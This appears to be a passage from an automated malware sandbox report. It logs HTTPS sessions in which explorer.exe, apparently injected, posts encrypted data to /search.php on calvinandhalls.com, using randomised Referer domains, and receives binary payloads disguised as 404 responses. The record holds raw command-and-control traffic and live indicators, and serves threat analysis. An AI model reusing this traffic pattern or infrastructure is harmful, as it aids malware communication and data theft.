                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lm4%<-S*,zD;4?tp`{5 L#W_y'-eyGz(waz=5R9|+/o5A+|X+vJZ-@(+?~b&4;z@4\+3dR.=FY
                                                                      2024-10-03 10:28:51 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:51 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.44977523.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:52 UTC287OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://sahqobiyulqik.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 328
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:52 UTC328OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 37 c6 17 98 a5 ca 4a 16 d9 7e 00 b0 36 97 ed 77 7e c4 02 59 5f 99 be 8e 3d e6 e8 01 67 8d a5 40 9f 70 5a 8e f0 09 3a 3a 02 33 2b f5 64 d9 f0 c3 22 93 eb 7d 6d 39 8e 61 48 d0 41 6d e1 82 83 b9 02 25 cb 5d bc 3a b1 10 36 97 10 89 77 4f 28 2d 76 f5 b3 7f e1 de 7d db 5d 04 e8 df d4 3a b3 99 4e 84 9f 83 b4 34 53 af 97 a2 07 0b 8a 41 41 9c 68 74 23 b3 68 00 69 f3 1c 71 59 d0 d1 99 39 49 c6 d3 67 93 70 c3 e3 e5 08 01 22 56 f7 56 2c 7d 26 26 e1 5a a4 d5 10 2f 35 39 42 9c f9 2a 3a 3b 37 96 cf d2 3d d8 ee 3b de 73 95 8d a8 cd 09 b6 5d
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lb4%<7J~6w~Y_=g@pZ::3+d"}m9aHAm%]:6wO(-v}]:N4SAAht#hiqY9Igp"VV,}&&Z/59B*:;7=;s]
                                                                      2024-10-03 10:28:52 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:52 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.44977623.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:53 UTC285OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://ccbxpmvivyv.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 356
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:53 UTC356OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 6b f4 18 9a 86 e4 3b 3a de 10 75 a2 2c cb d1 2f 32 d0 78 0e 30 ae b4 d6 6f e4 d0 57 5e f0 b7 7f f0 63 63 fb 83 72 75 62 01 5d 44 da 7d b3 e7 db 53 d3 ad 48 16 26 85 0f 34 d7 2c 40 dd 89 e0 b6 50 64 bc 5b bb 57 82 0f 64 cb 2e be 55 4e 6d 6f 52 ec bd 05 ac 94 3d f0 16 08 ce c1 c9 53 a1 ac 5c ff d2 96 ba 47 27 91 c9 de 0b 20 da 17 16 95 17 43 13 b3 2e 24 2d aa 39 08 2a 8a 96 9a 72 32 c4 d2 6e 90 20 95 f1 d9 30 3f 2b 79 be 5c 66 06 3e 34 a9 18 96 9d 7b 5b 24 2d 5a c2 f7 27 31 43 58 d6 f0 d3 5c f4 cc 71 eb 23 df b1 d5 c3 65 91 7c
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lc4%<k;:u,/2x0oW^ccrub]D}SH&4,@Pd[Wd.UNmoR=S\G' C.$-9*r2n 0?+y\f>4{[$-Z'1CX\q#e|
                                                                      2024-10-03 10:28:53 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:53 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.44977723.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:53 UTC290OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://wxjecgujyrvwrcxv.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 152
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:53 UTC152OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 24 a0 16 a9 b1 c8 21 3b bd 66 3e 81 25 86 e0 12 01 b3 63 2e 31 91 c9 fc 69 eb dd 76 13 e1 fb 78 85 45 7a e7 d7 5e 14 2c 78 35 2b df 1e 92 85 8e 3c e6 e4 22 23 4f ec 6d 0d d5 36 47 f6 9d ac d8 4a 6d a0 06 fc 66 9a 0a 3f fb
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@L`4%<$!;f>%c.1ivxEz^,x5+<"#Om6GJmf?
                                                                      2024-10-03 10:28:54 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:54 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.44977823.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:54 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://etbvtxkiimobbb.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 137
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:54 UTC137OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 62 e6 11 a0 81 ac 56 06 c0 39 14 be 4b ec c6 15 7b c5 2c 12 28 d0 bc ed 71 b1 cf 1e 42 9e 97 58 f9 5d 2e bb 97 6d 04 56 6e 0e 26 ea 10 c4 c2 93 3f d4 92 48 32 11 99 04 48 ab 1f
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@La4%<bV9K{,(qBX].mVn&?H2H
                                                                      2024-10-03 10:28:55 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:55 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.44977923.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:55 UTC290OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://xidhlcltwnrqmpms.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 153
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:55 UTC153OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 4e e7 20 f8 c1 be 49 36 ae 33 02 b6 7a e0 83 0c 36 e0 3d 1a 4c bb da 8c 4e bc a1 57 67 88 bc 3c ea 20 29 9a f0 1a 72 39 63 0c 3f 99 18 a3 95 a7 03 e9 ad 3d 67 2a ee 1f 4c d5 70 1a c8 d1 99 d9 4e 3e 90 12 a6 77 96 14 62 9d 6a
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lf4%<N I63z6=LNWg< )r9c?=g*LpN>wbj
                                                                      2024-10-03 10:28:56 UTC294INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 03 Oct 2024 10:28:55 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      2024-10-03 10:28:56 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 88 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                      Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
                                                                      2024-10-03 10:28:56 UTC19INData Raw: 1a 58 b2 14 d1 ff ef 1b ab d4 44 9e af 19 24 1b 3c de a6
                                                                      Data Ascii: XD$<
                                                                      2024-10-03 10:28:56 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-10-03 10:28:56 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                      Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                      2024-10-03 10:28:56 UTC6INData Raw: 4e 13 8c ae b0 c6
                                                                      Data Ascii: N
                                                                      2024-10-03 10:28:56 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-10-03 10:28:56 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b1 80 d9 81 f6 4a 57 1f 8f 04 5f c4 c1 88 46 ee 18 f5 d8 fe a1 a3 c6 ae 36 1a 9c e0 fa 7a 50 95 22 b4 51 4c 25 b1 f4 18 0d 15 d0 06 0a 15 7b 22 d8 b8 63 41 09 53 8a 61 25 04 92 dd b9 c8 34 da 29 b1 d3 b5 7c 9b b7 ff 21 7f 68 a2 a1 99 ca f2 df ce 53 bb f5 67 4b 05 db de 01 f7 41 65 c4 8c 62 3c 94 b8 4a 79 8f 0f fc ed 98 91 1c 6c 74 27 cb 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 66 b6 ee 85 11 52 c9 be 4e b1 d6 66 9c d8 30 3f 8d 93 5a f4 d5 f2 5f 31 3d a5 2f 45 84 49 21 aa 61 87 37 f6 f5 9a 70 4c 4c f9 1d fb e1 fe d1 ef cb f9 05 71 1e 89 dd 8a 35
                                                                      Data Ascii: 20007JW_F6zP"QL%{"cASa%4)|!hSgKAeb<Jylt'DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vfRNf0?Z_1=/EI!a7pLLq5
                                                                      2024-10-03 10:28:56 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                      Data Ascii: G-Q
                                                                      2024-10-03 10:28:56 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.44978023.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:56 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://iqpmunwonthwxj.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 276
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:56 UTC276OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 66 34 01 83 b6 25 93 3c 5d bf 11 b6 b8 c7 42 5d ec 2f 05 96 7b 9e d0 2d 6a fa 14 54 3b d7 ad 8d 3e e5 b6 7d 7a ed eb 6d aa 21 7a 90 dc 04 01 39 4f 29 4a 94 11 93 88 cd 22 f4 a9 38 6f 54 90 67 56 e6 6d 71 82 e1 9a 90 55 0c bb 64 a8 4b ab 15 5e ab 5d be 6f 63 41 0e 56 f1 ac 66 bf a8 79 8f 2d 76 da bd d0 15 ed 8c 79 88 c7 e4 d9 15 4b d9 84 99 00 09 d8 02 30 d5 0b 60 25 84 76 20 72 bc 15 11 42 f9 d4 ce 71 68 92 ed 1a b4 21 ea b1 f2 14 30 6d 59 bd 71 0a 6f 04 71 a6 17 e3 92 1e 3d 72 3a 0c ef 95 43 6a 5f 3d ca 9a 9b 57 e5 df 20 82 3f 90 fe f7 c4 04 ad 22
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[ALf4%<]B]/{-jT;>}zm!z9O)J"8oTgVmqUdK^]ocAVfy-vyK0`%v rBqh!0mYqoq=r:Cj_=W ?"
                                                                      2024-10-03 10:28:57 UTC287INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 03 Oct 2024 10:28:57 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 409
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-10-03 10:28:57 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.44978123.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:57 UTC287OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://xujwwosldbarb.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 182
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:57 UTC182OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 5c c1 0d 91 d3 d3 4f 37 c5 69 16 e6 6a d5 8d 0b 72 c1 78 47 76 98 d9 9c 24 cc f2 5f 5e fa 86 38 9e 2d 7d b3 87 5d 0b 46 5a 00 2c d3 32 d4 9f 87 2c 92 94 67 68 48 93 74 4c fd 6e 76 da 8f b3 dc 0a 3b 93 18 c7 55 b3 00 5c b3 5e 9f 46 36 57 33 7f c0 f5 0c 9d de 1f fc 3f 77 c6 de c6 00 ac 8e 46 b4 a4 b5 b5 25 74 e5
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Lg4%<\O7ijrxGv$_^8-}]FZ,2,ghHtLnv;U\^F6W3?wF%t
                                                                      2024-10-03 10:28:58 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:58 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.44978223.145.40.1624432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:58 UTC285OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://vntsetisbky.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 295
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:28:58 UTC295OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 46 ac 63 99 c9 f8 4d 53 bb 13 15 97 24 8f cf 60 6d d1 35 0b 41 a3 a3 dc 6a ea c3 77 66 d2 b8 6b 9f 27 35 ad 8b 58 7c 3c 7d 29 39 e1 29 a7 d2 80 3a 80 bf 4e 6f 26 b3 66 5c c5 47 00 f4 f3 91 d0 3a 17 db 63 f7 55 fb 15 44 da 59 b6 4d 24 4d 16 58 b3 c1 4a b1 d1 0d c7 31 2f c6 bc b3 19 c7 e3 42 9a d4 b0 db 23 4e c8 97 a2 6a 58 bf 67 5f ce 7a 6f 19 f9 6a 01 40 d5 53 11 05 ff a1 f2 76 46 df eb 15 ab 7b 82 c3 c3 09 7b 69 6a f1 7e 23 1d 20 37 d1 39 8e ae 6e 0e 20 71 1e f0 83 42 38 5b 07 d5 80 de 3e 97 c2 08 8c 5c b4 ba e3 b4 68 9d 36
                                                                      Data Ascii: rzmM-a|6A| )6IP g3iqH[@Ld4%<FcMS$`m5Ajwfk'5X|<})9):No&f\G:cUDYM$MXJ1/B#NjXg_zoj@SvF{{ij~# 79n qB8[>\h6
                                                                      2024-10-03 10:28:59 UTC278INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:59 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.44978323.145.40.1624436072C:\Windows\SysWOW64\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:29:03 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://calvinandhalls.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 4431
                                                                      Host: calvinandhalls.com
                                                                      2024-10-03 10:29:03 UTC4431OUTData Raw: 72 19 83 ce fc 7a 1d 8f 6d 83 ee 1b 4d 81 19 2d dc f3 b6 da 61 7c 36 83 06 02 b4 9a ef a1 41 9f 7c 97 ba 80 00 f1 a9 88 86 0e d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ce 1d f6 1f 32 ec e1 bd 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f
                                                                      Data Ascii: rzmM-a|6A|nluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu|2:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
                                                                      2024-10-03 10:29:03 UTC287INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 03 Oct 2024 10:29:03 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 409
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-10-03 10:29:03 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


